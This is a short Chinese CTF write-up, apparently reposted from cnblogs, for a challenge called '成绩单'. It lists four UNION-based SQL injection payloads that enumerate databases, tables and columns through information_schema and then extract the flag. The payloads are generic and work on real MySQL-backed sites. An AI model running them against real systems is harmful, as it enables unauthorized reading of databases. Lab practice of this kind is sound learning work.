码迷,mamicode.com
首页 > 其他好文 > 详细

ctf实验平台-成绩单

时间:2017-11-28 01:44:36      阅读:509      评论:0      收藏:0      [点我收藏+]

标签:col   ati   union   tar   tab   cat   blank   技术   column   

 

题目链接:http://120.24.86.145:8002/chengjidan/

平台地址:http://123.206.31.85/

第一步:暴库

id=-1‘ union select 1,2,3,group_concat(schema_name) from information_schema.schemata#

技术分享图片

第二步:爆表

id=-1‘ union select 1,2,3,table_name from information_schema.tables where table_schema=0x736b6374665f666c6167#

技术分享图片

第三步:爆字段

id=-1‘ union select 1,2,3,column_name from information_schema.columns where table_name=0x666c3467#

技术分享图片

第四步:爆内容

id=-1‘ union select 1,2,3,group_concat(skctf_flag) from skctf_flag.fl4g#

技术分享图片

 本文固定链接:http://www.cnblogs.com/hell0w/p/7906711.html

ctf实验平台-成绩单

标签:col   ati   union   tar   tab   cat   blank   技术   column   

原文地址:http://www.cnblogs.com/hell0w/p/7906711.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!